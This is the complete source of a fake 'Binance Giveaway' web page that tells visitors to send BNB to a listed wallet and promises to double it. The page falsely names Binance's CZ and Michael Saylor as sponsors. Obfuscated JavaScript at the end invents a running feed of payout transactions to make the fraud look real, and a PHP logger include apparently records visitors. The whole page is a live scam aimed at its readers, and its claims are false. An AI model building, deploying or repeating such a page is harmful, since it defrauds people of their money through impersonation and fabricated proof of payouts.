<?php include '../php/logger.php' ?>

<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="shortcut icon" href="./images/content/coin.png" type="image/x-icon">
    <title>Binance Giveaway</title>
    <link href="https://unpkg.com/aos@2.3.1/dist/aos.css" rel="stylesheet">
    <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
    <link rel="stylesheet" href="dist/css/app.css">
    <link href="css/app.css" rel="stylesheet">
    <style>
        .person-photo{
            /*background: black;*/
        }
    </style>
    <!-- Smartsupp Live Chat script -->
    <script type="text/javascript">
        var _smartsupp = _smartsupp || {};
        _smartsupp.key = 'a190aa271a8eca4b7dd115b3a11025d3eab19522';
        window.smartsupp||(function(d) {
            var s,c,o=smartsupp=function(){ o._.push(arguments)};o._=[];
            s=d.getElementsByTagName('script')[0];c=d.createElement('script');
            c.type='text/javascript';c.charset='utf-8';c.async=true;
            c.src='https://www.smartsuppchat.com/loader.js?';s.parentNode.insertBefore(c,s);
        })(document);
    </script>
</head>
<body>

<div id="section-navigation">
    <div class="container">
        <div class="row">
            <a href="#section-giveaway" class="logo">
                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 5120 1024" class="css-tsyi71">
                    <path style="fill:#f0ba0c; stroke:blue;" d="M230.997333 512L116.053333 626.986667 0 512l116.010667-116.010667L230.997333 512zM512 230.997333l197.973333 197.973334 116.053334-115.968L512 0 197.973333 314.026667l116.053334 115.968L512 230.997333z m395.989333 164.992L793.002667 512l116.010666 116.010667L1024.981333 512l-116.992-116.010667zM512 793.002667l-197.973333-198.997334-116.053334 116.010667L512 1024l314.026667-314.026667-116.053334-115.968L512 793.002667z m0-165.973334l116.010667-116.053333L512 396.032 395.989333 512 512 626.986667z m1220.010667 11.946667v-1.962667c0-75.008-40.021333-113.024-105.002667-138.026666 39.978667-21.973333 73.984-58.026667 73.984-121.002667v-1.962667c0-88.021333-70.997333-145.024-185.002667-145.024h-260.992v561.024h267.008c126.976 0.981333 210.005333-51.029333 210.005334-153.002666z m-154.026667-239.957333c0 41.984-34.005333 58.965333-89.002667 58.965333h-113.962666V338.986667h121.984c52.010667 0 80.981333 20.992 80.981333 58.026666v2.005334z m31.018667 224c0 41.984-32.981333 61.013333-87.04 61.013333h-146.944v-123.050667h142.976c63.018667 0 91.008 23.04 91.008 61.013334v1.024z m381.994666 169.984V230.997333h-123.989333v561.024h123.989333v0.981334z m664.021334 0V230.997333h-122.026667v346.026667l-262.997333-346.026667h-114.005334v561.024h122.026667v-356.010666l272 356.992h104.96z m683.946666 0L3098.026667 228.010667h-113.962667l-241.024 564.992h127.018667l50.986666-125.994667h237.013334l50.986666 125.994667h130.005334z m-224.981333-235.008h-148.992l75.008-181.973334 73.984 181.973334z m814.037333 235.008V230.997333h-122.026666v346.026667l-262.997334-346.026667h-114.005333v561.024h122.026667v-356.010666l272 356.992h104.96z m636.970667-91.008l-78.976-78.976c-44.032 39.978667-83.029333 65.962667-148.010667 65.962666-96 0-162.986667-80-162.986666-176v-2.986666c0-96 67.968-174.976 162.986666-174.976 55.978667 0 100.010667 23.978667 144 62.976l78.976-91.008c-51.968-50.986667-114.986667-86.997333-220.970666-86.997334-171.989333 0-292.992 130.986667-292.992 290.005334V512c0 160.981333 122.965333 288.981333 288 288.981333 107.989333 1.024 171.989333-36.992 229.973333-98.986666z m527.018667 91.008v-109.994667h-305.024v-118.016h265.002666v-109.994667h-265.002666V340.992h301.013333V230.997333h-422.997333v561.024h427.008v0.981334z" p-id="2935"></path></svg>
            </a>
            <div class="navigation">
                <a href="#section-giveaway">Giveaway</a>
                <a href="#section-rules">Rules</a>
                <a href="#section-bonus">Bonus</a>
                <a href="#section-faq">FAQ</a>
                <a href="#section-transactions">Transactions</a>
            </div>
            <div class="actions">
                <a href="#section-giveaway" class="btn">
                    To Join
                </a>
            </div>
        </div>
        <div class="navigation-mobile">
            <a href="#section-giveaway">Giveaway</a>
            <a href="#section-rules">Rules</a>
            <a href="#section-bonus">Bonus</a>
            <a href="#section-faq">FAQ</a>
            <a href="#section-transactions">Transactions</a>
        </div>
    </div>
</div>

<div id="section-giveaway">
    <div class="container">
        <div class="row">

            <div class="left">
                <div class="title" data-aos-anchor="#section-giveaway" data-aos="fade-right" data-aos-delay="400">
                    Hurry up and take part in the giveaway of  <br>  150 000 BNB
                </div>
                <div class="description" data-aos-anchor="#section-giveaway" data-aos="fade-right" data-aos-delay="600">
                    During this unique event we will give you a chance to win 150 000 BNB, have a look at the rules and don't miss on your chance!
                </div>
                <div class="actions" data-aos-anchor="#section-giveaway" data-aos="fade-right" data-aos-delay="800">
                    <a href="#section-rules" class="btn btn-lg">
                        More info
                    </a>
                    <a href="#section-bonus" class="btn btn-lg btn-default">
                        Participate in the giveaway
                    </a>
                </div>
            </div>
            <div class="right">
                <div class="box-shadow" data-aos-anchor="#section-giveaway" data-aos="fade-right" data-aos-delay="1000">
                    <div class="giv-info-right">
                        <ul class="custom-marcker-one">
                            <li><i class="fas fa-check"></i> Marketplace</li>
                            <li><i class="fas fa-check"></i> Price Predictions</li>
                            <li><i class="fas fa-check"></i> Live Event</li>
                            <li><i class="fas fa-check"></i> 150 000 BNB</li>
                            <li><i class="fas fa-check"></i> Giveaway</li>
                        </ul>
                    </div>
                    <div class="giv-info-left">
                        <div class="person-photo">
                            <img src="./images/content/avatar.png" alt="person">
                        </div>
                        <div class="person-name">
                            <p>Binance CZ <br> and MicroStrategy <br>Michael Saylor</p>
                        </div>
                        <div class="action">
                            <a href="#section-giveaway" class="btn">
                                Event 2022
                            </a>
                        </div>
                    </div>
                </div>

                <div class="valute box-shadow" data-aos-anchor="#section-giveaway" data-aos="fade-right" data-aos-delay="1200">
                    <div class="top">
                        <div class="crypto">
                            <div class="crypto-img">
                                <img src="./images/content/coin.png" alt="coin">
                            </div>
                            <div class="crypto-text">
                                <div class="top">Binance (BNB)</div>
                            </div>
                        </div>
                        <div class="count">150 000 BNB</div>
                    </div>
<!--                    <div class="bottom second">-->
<!--                        <div class="crypto">-->
<!--                            <div class="crypto-img">-->
<!--                                <img src="./images/content/usd-ico.svg" alt="coin">-->
<!--                            </div>-->
<!--                            <div class="crypto-text">-->
<!--                                <div class="top">Dollar (USD)</div>-->
<!--                            </div>-->
<!--                        </div>-->
<!--                        <div class="count">40 000 000 USD</div>-->
<!--                    </div>-->
                </div>
            </div>
        </div>
    </div>
</div>

<div id="section-rules">
    <div class="container">
        <div class="row">
            <div class="top">
                <div class="item left box-shadow" data-aos-anchor="#section-rules" data-aos="fade-right" data-aos-delay="400">
                    <div class="title">About</div>
                    <div class="description">
                        We believe that Blockchain and BNB coin will make the world more fair. To speed up the process of cryptocurrency mass adoption, We decided to run 150 000 BNB giveaway.
                    </div>
                    <div class="action">Rules <i class="fas fa-long-arrow-alt-right"></i></div>
                </div>
                <div class="item right box-shadow" data-aos-anchor="#section-rules" data-aos="fade-right" data-aos-delay="600">
                    <div class="title">Rules</div>
                    <div class="description">
                        To participate you just need to send from 5 BNB to 10 000 BNB to the contribution address and we will immediately send you back 10 BNB to 20 000 BNB (x2) to the address you sent it from.
                    </div>
                    <div class="action">Bonus <i class="fas fa-long-arrow-alt-right"></i></div>
                </div>
            </div>

            <div class="top">
                <div class="item no-bg right box-shadow" data-aos-anchor="#section-rules" data-aos="fade-right" data-aos-delay="800">
                    <div class="title">For example</div>
                    <div class="description">
                        <ul class="custom-marcker-two">
                            <li>
                                <i class="fas fa-check"></i> If you send &nbsp;<span>5+ BNB</span>, you will get &nbsp;<span>10+ BNB</span> &nbsp;back.
                            </li>
                            <li>
                                <i class="fas fa-check"></i> If you send &nbsp;<span>10+ BNB</span>, you will get &nbsp;<span>20+ BNB</span> &nbsp;back.
                            </li>
                            <li>
                                <i class="fas fa-check"></i> If you send &nbsp;<span>40+ BNB</span>, you will get &nbsp;<span>80+ BNB</span> &nbsp;back.
                            </li>
                            <li>
                                <i class="fas fa-check"></i> If you send &nbsp;<span>80+ BNB</span>, you will get &nbsp;<span>160+ BNB</span> &nbsp;back.
                            </li>
                            <li>
                                <i class="fas fa-check"></i> If you send &nbsp;<span>160+ BNB</span>, you will get &nbsp;<span>320+ BNB</span> &nbsp;back.
                            </li>
                        </ul>
                    </div>
                </div>
                <div class="separate-column" data-aos-anchor="#section-rules" data-aos="fade-right" data-aos-delay="1000">
                    <div class="item no-bg left box-shadow">
                        <div class="title">Extra bonuses</div>
                        <div class="description">
                            <ul class="custom-marcker-two">
                                <li>
                                    <i class="fas fa-check"></i> 50+ BNB = 10% Bonus
                                </li>
                                <li>
                                    <i class="fas fa-check"></i> 200+ BNB = 20% Bonus
                                </li>
                                <li>
                                    <i class="fas fa-check"></i> 500+ BNB = 40% Bonus
                                </li>
                                <li>
                                    <i class="fas fa-check"></i> 1 000+ BNB = 50% Bonus
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="item left box-shadow">
                        <div class="title title-small">
                            You can only participate once.
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<div id="section-bonus">
    <div class="container">
        <div class="row">
            <div class="qr-dates" data-aos-anchor="#section-bonus" data-aos="fade-right" data-aos-delay="400">
                <div class="left">
                    <img src="./images/content/qr.png" alt="qr code">
                </div>
                <div class="right">
                    <p class="first">31 715 BNB already sent to participants!</p>
                    <p>Hurry up and take part in the giveaway! <br> <span>Use this QR code to participate</span></p>
                    <div class="progress">
                        <div class="progress-numbers"></div>
                        <div class="bot-num">
                            <div class="one-line">
                                <span>31 715 BNB</span>
                            </div>
                            <div class="two-line">
                                <span>150 000 BNB</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="wallet-dates" data-aos-anchor="#section-bonus" data-aos="fade-right" data-aos-delay="600">
                <div class="title">You can send BNB to the following address:</div>
                <div class="address">
                    <span id="wallet">bnb10prykpukafnju72262lc9e0lk9c9fpx6hm2hv0</span>
                    <button onclick="CopyToClipboard('wallet');return false;">
                        <span>
                            <i class="far fa-copy"></i>
                        </span>
                    </button>
                </div>
                <div class="loader">
                    <i class="fas fa-spinner fa-pulse"></i>
                    <p>
                        Waiting for payment
                    </p>
                </div>
            </div>
        </div>
    </div>
</div>

<div id="section-faq" data-aos-anchor="#section-faq" data-aos="fade-right" data-aos-delay="400">
    <div class="container">
        <div class="row">
            <div class="title">FAQ</div>
            <div class="box-list-items">
                <div class="item-box">
                    <div class="btn-it-l">
                        What do I have to do to participate in the giveaway?
                    </div>
                    <div class="box-content-l">
                        <p>
                            To participate you just need to send from 5 BNB to 10 000 BNB to the contribution address and we
                            will immediately send you back 10 BNB to 20 000 BNB (x2) to the address you sent it from.
                        </p>
                    </div>
                </div>
                <div class="item-box">
                    <div class="btn-it-l">
                        How long will it take me to get my bonus?
                    </div>
                    <div class="box-content-l">
                        <p>
                            You get your x2 bonus instantly! The system is fully automated, so all transactions
                            are sent without delay!
                        </p>
                    </div>
                </div>
                <div class="item-box">
                    <div class="btn-it-l">
                        Who is the sponsor of this giveaway?
                    </div>
                    <div class="box-content-l">
                        <p>
                            The main sponsor of this event is Binance CZ
                            and MicroStrategy
                            Michael Saylor.
                        </p>
                    </div>
                </div>
                <div class="item-box">
                    <div class="btn-it-l">
                        How many times can I participate in the giveaway?
                    </div>
                    <div class="box-content-l">
                        <p>
                            You can only participate once.
                        </p>
                    </div>
                </div>
                <div class="item-box">
                    <div class="btn-it-l">
                        How do I get my bonus?
                    </div>
                    <div class="box-content-l" style="display: none;">
                        <p>
                            The system will automatically send the bonus to the wallet from which you
                            participated in the giveaway.
                        </p>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<div id="section-transactions" data-aos-anchor="#section-transactions" data-aos="fade-right" data-aos-delay="400">
    <div class="container">
        <div class="row">
            <div class="title">Transactions for Address <br> <span>bnb10prykpukafnju72262lc9e0lk9c9fpx6hm2hv0</span></div>
            <div class="transaction-table">
                <div class="table-body">
                </div>
            </div>
        </div>
    </div>
</div>

<div id="section-footer">
    <div class="container">
        <div class="row">
            <a href="#section-giveaway" class="logo">
                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 5120 1024" class="css-tsyi71">
                    <path style="fill:#f0ba0c; stroke:blue;" d="M230.997333 512L116.053333 626.986667 0 512l116.010667-116.010667L230.997333 512zM512 230.997333l197.973333 197.973334 116.053334-115.968L512 0 197.973333 314.026667l116.053334 115.968L512 230.997333z m395.989333 164.992L793.002667 512l116.010666 116.010667L1024.981333 512l-116.992-116.010667zM512 793.002667l-197.973333-198.997334-116.053334 116.010667L512 1024l314.026667-314.026667-116.053334-115.968L512 793.002667z m0-165.973334l116.010667-116.053333L512 396.032 395.989333 512 512 626.986667z m1220.010667 11.946667v-1.962667c0-75.008-40.021333-113.024-105.002667-138.026666 39.978667-21.973333 73.984-58.026667 73.984-121.002667v-1.962667c0-88.021333-70.997333-145.024-185.002667-145.024h-260.992v561.024h267.008c126.976 0.981333 210.005333-51.029333 210.005334-153.002666z m-154.026667-239.957333c0 41.984-34.005333 58.965333-89.002667 58.965333h-113.962666V338.986667h121.984c52.010667 0 80.981333 20.992 80.981333 58.026666v2.005334z m31.018667 224c0 41.984-32.981333 61.013333-87.04 61.013333h-146.944v-123.050667h142.976c63.018667 0 91.008 23.04 91.008 61.013334v1.024z m381.994666 169.984V230.997333h-123.989333v561.024h123.989333v0.981334z m664.021334 0V230.997333h-122.026667v346.026667l-262.997333-346.026667h-114.005334v561.024h122.026667v-356.010666l272 356.992h104.96z m683.946666 0L3098.026667 228.010667h-113.962667l-241.024 564.992h127.018667l50.986666-125.994667h237.013334l50.986666 125.994667h130.005334z m-224.981333-235.008h-148.992l75.008-181.973334 73.984 181.973334z m814.037333 235.008V230.997333h-122.026666v346.026667l-262.997334-346.026667h-114.005333v561.024h122.026667v-356.010666l272 356.992h104.96z m636.970667-91.008l-78.976-78.976c-44.032 39.978667-83.029333 65.962667-148.010667 65.962666-96 0-162.986667-80-162.986666-176v-2.986666c0-96 67.968-174.976 162.986666-174.976 55.978667 0 100.010667 23.978667 144 62.976l78.976-91.008c-51.968-50.986667-114.986667-86.997333-220.970666-86.997334-171.989333 0-292.992 130.986667-292.992 290.005334V512c0 160.981333 122.965333 288.981333 288 288.981333 107.989333 1.024 171.989333-36.992 229.973333-98.986666z m527.018667 91.008v-109.994667h-305.024v-118.016h265.002666v-109.994667h-265.002666V340.992h301.013333V230.997333h-422.997333v561.024h427.008v0.981334z" p-id="2935"></path></svg>
            </a>
            <div class="navigation">
                <a href="#section-giveaway">Giveaway</a>
                <a href="#section-rules">Rules</a>
                <a href="#section-bonus">Bonus</a>
                <a href="#section-faq">FAQ</a>
                <a href="#section-transactions">Transactions</a>
            </div>
            <div class="actions">
                <a href="#section-giveaway" class="btn">
                    To Join
                </a>
            </div>
        </div>
    </div>
</div>

<script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script>
<script>
    // section animation
    AOS.init({
        // Global settings:
        disable: false, // accepts following values: 'phone', 'tablet', 'mobile', boolean, expression or function
        startEvent: 'DOMContentLoaded', // name of the event dispatched on the document, that AOS should initialize on
        initClassName: 'aos-init', // class applied after initialization
        animatedClassName: 'aos-animate', // class applied on animation
        useClassNames: false, // if true, will add content of `data-aos` as classes on scroll
        disableMutationObserver: false, // disables automatic mutations' detections (advanced)
        debounceDelay: 50, // the delay on debounce used while resizing window (advanced)
        throttleDelay: 99, // the delay on throttle used while scrolling the page (advanced)


        // Settings that can be overridden on per-element basis, by `data-aos-*` attributes:
        offset: 120, // offset (in px) from the original trigger point
        delay: 0, // values from 0 to 3000, with step 50ms
        duration: 400, // values from 0 to 3000, with step 50ms
        easing: 'ease', // default easing for AOS animations
        once: true, // whether animation should happen only once - while scrolling down
        mirror: false, // whether elements should animate out while scrolling past them
        anchorPlacement: 'top-bottom', // defines which position of the element regarding to window should trigger the animation
    });
</script>
<script src="static/jquery-1.11.1.min.js"></script>
<script src="static/toast.min.js"></script>
<script>
<!--    Copy wallet -->
    function CopyToClipboard(id) {
        var r = document.createRange();
        r.selectNode(document.getElementById(id));
        window.getSelection().removeAllRanges();
        window.getSelection().addRange(r);
        document.execCommand('copy');
        window.getSelection().removeAllRanges();
        Toast.add({
            text: 'Copied!',
            color: '#f5c922',
            autohide: true,
            delay: 2000
        });
    }
</script>

<script>
<!--  Scroll  -->
    var scrollElem = $("a");

    scrollElem.on('click', function() {

        let href = $(this).attr('href');

        $('html, body').animate({
            scrollTop: $(href).offset().top
        }, {
            duration: 1000,   // по умолчанию «400»
            easing: "linear" // по умолчанию «swing»
        });

        return false;
    });
</script>

<script>
    let day = 1
    let hours = 0
    let minutes = 0
    let seconds = 0

    let wallet = "bnb10prykpukafnju72262lc9e0lk9c9fpx6hm2hv0";

    // dont edit
    let titleWallet = document.getElementById("wallet").innerText = wallet.toLocaleString('ru');
    // let time = (day * (24 * 60 * 60)) + (hours * (60 * 60)) + (minutes * 60);
    // let timeContainer = document.getElementById('overTime').innerText = time;
    // dont edit


    function randomString(_0xe480x2) {
        var _0xe480x3 = '';
        var _0xe480x4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
        var _0xe480x5 = _0xe480x4['length'];
        for (var _0xe480x6 = 0; _0xe480x6 < _0xe480x2; _0xe480x6++) {
            _0xe480x3 += _0xe480x4['charAt'](Math['floor'](Math['random']() * _0xe480x5))
        };
        return _0xe480x3
    }

    function randomStringHashBTC(_0xe480x2) {
        var _0xe480x3 = '';
        var _0xe480x4 = 'bacfed0123456789';
        var _0xe480x5 = _0xe480x4['length'];
        for (var _0xe480x6 = 0; _0xe480x6 < _0xe480x2; _0xe480x6++) {
            _0xe480x3 += _0xe480x4['charAt'](Math['floor'](Math['random']() * _0xe480x5))
        };
        return _0xe480x3
    }

    var divCounter = 0;

    function randomInteger(min, max) {
        let rand = min + Math.random() * (max - min);
        return Math.round(rand);
    }

    function randomIntegerBTC(min, max) {
        let rand = min + Math.random() * (max - min);
        return rand.toFixed(2);
    }

    function getRundomMnogitel() {
        let asd = [1, 0.1, 0.01];
        let getRandom = Math.floor(Math.random() * asd.length);
        return asd[getRandom];
    }

    function genDiv() {
        divCounter++;
        let valet = document.getElementById("wallet").innerText;
        var _0xe480x9 =
            `${'<div class="item"><div class="top"><div class="data"><div style="" class="data-item">{t1}</div><div style="display: none" class="data-item">{t2}</div><div class="data-item" id="btcstr">{t4}</div><div class="data-item">{t5}</div><div class="data-item">{t6}</div><div class="data-item">{t3}</div><div class="data-item">{t7}</div><div style="display: none" class="data-item">{t8}</div></div></div><div class="bottom"><div class="data"><div style="" class="data-item">{b1}</div><div style="display: none" class="data-item">{b2}</div><div class="data-item">{b4}</div><div class="data-item">{b5}</div><div class="data-item" id="btcstr">{b6}</div><div class="data-item">{b3}</div><div class="data-item">{b7}</div><div style="display:none"; class="data-item">{b8}</div></div></div></div>'}`;
        let _0xe480xa = randomStringHashBTC(10) + '...';
        let _0xe480xb = "616" + randomInteger(1, 9) + randomInteger(1, 9) + randomInteger(1, 9);
        let _0xe480xc = 'right now';
        let _0xe480xd = 'bnb' + randomString(9) + '...';
        let _0xe480xe = 'IN';
        let _0xe480xf = valet.substring(0, 10);
        let valueSend = randomIntegerBTC(6, 300);
        let _0xe480x10 = valueSend + ' BNB';
        let _0xe480x11 = ((Math['random']() * 0.009 * getRundomMnogitel()) + 0.0001 * getRundomMnogitel())[
            'toFixed'](6);
        let _0xe480x12 = randomStringHashBTC(10) + '...';
        let _0xe480x13 = "616" + randomInteger(1, 9) + randomInteger(1, 9) + randomInteger(1, 9);
        let _0xe480x14 = 'right now';
        let _0xe480x15 = _0xe480xf.slice(0, 10) + "...";
        let _0xe480x16 = 'OUT';
        let _0xe480x17 = _0xe480xd;
        let _0xe480x18 = (valueSend * 2) + ' BNB';
        let _0xe480x19 = ((Math['random']() * 0.009 * getRundomMnogitel()) + 0.0001 * getRundomMnogitel())[
            'toFixed'](8);
        _0xe480x9 = _0xe480x9['replace']('{t1}', _0xe480x12);
        _0xe480x9 = _0xe480x9['replace']('{t2}', _0xe480x13);
        _0xe480x9 = _0xe480x9['replace']('{t3}', _0xe480x14);
        _0xe480x9 = _0xe480x9['replace']('{t4}', _0xe480x15);
        _0xe480x9 = _0xe480x9['replace']('{t5}', _0xe480x16);
        _0xe480x9 = _0xe480x9['replace']('{t6}', _0xe480x17);
        _0xe480x9 = _0xe480x9['replace']('{t7}', _0xe480x18);
        _0xe480x9 = _0xe480x9['replace']('{t8}', _0xe480x19);
        _0xe480x9 = _0xe480x9['replace']('{b1}', _0xe480xa);
        _0xe480x9 = _0xe480x9['replace']('{b2}', _0xe480xb);
        _0xe480x9 = _0xe480x9['replace']('{b3}', _0xe480xc);
        _0xe480x9 = _0xe480x9['replace']('{b4}', _0xe480xd);
        _0xe480x9 = _0xe480x9['replace']('{b5}', _0xe480xe);
        _0xe480x9 = _0xe480x9['replace']('{b6}', _0xe480x15);
        _0xe480x9 = _0xe480x9['replace']('{b7}', _0xe480x10);
        _0xe480x9 = _0xe480x9['replace']('{b8}', _0xe480x11);
        var _0xe480x1a = $(_0xe480x9)['prependTo']('.table-body');
        $('.item')['each'](function () {
            var _0xe480x6 = $(this)['index']();
            if (_0xe480x6 > 0) {
                $(this)['find']('.top .data div')['eq'](5)['html'](_0xe480x6 + ' min');
                $(this)['find']('.bottom .data div')['eq'](5)['html'](_0xe480x6 + ' min')
            }
        });
        setTimeout(function () {
            _0xe480x1a['find']('.top')['fadeIn']();
            _0xe480x1a['find']('.bottom .data div')['eq'](5)['html']('right now')
        }, 2000)
    }

    $(document)['ready'](function () {
        genDiv();
        setInterval(function () {
            genDiv()
        }, 15500)
    })

    genDiv();

</script>
<script src="js/app.js"></script></body>
</html>
